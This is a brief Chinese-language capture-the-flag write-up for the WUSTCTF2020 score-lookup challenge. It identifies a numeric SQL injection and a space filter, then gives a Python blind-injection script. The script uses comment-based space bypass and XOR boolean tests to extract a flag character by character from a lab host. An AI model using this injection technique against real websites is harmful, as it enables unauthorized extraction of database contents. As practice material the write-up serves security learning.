[WUSTCTF2020]颜值成绩查询
只有一个输入框,是sql注入题目
尝试输入1,2,3
可以发现是get方法提交的参数且是数字型
故用hackbar
/?stunum=1 or 1=2 %23
student number not exists.
刚刚还可以查到现在查不到了判断存在过滤
尝试下发现是空格
上盲注脚本
import string
import requests
select=f"select/**/value/**/from/**/flag"
ans=""
for i in range(1,100):
for ascii in range(32,128):
url = f"http://adad8be9-a1e6-4d5b-9bd5-6dc612e1db73.node4.buuoj.cn:81/?stunum=1^(ascii(substr(({select}),{i},1))={ascii})^1"
print(url)
print(ans)
res=requests.get(url)
if "Hi admin, your score is: 100" in res.text:
ans+=chr(ascii)
break
if ascii ==127:
exit(0)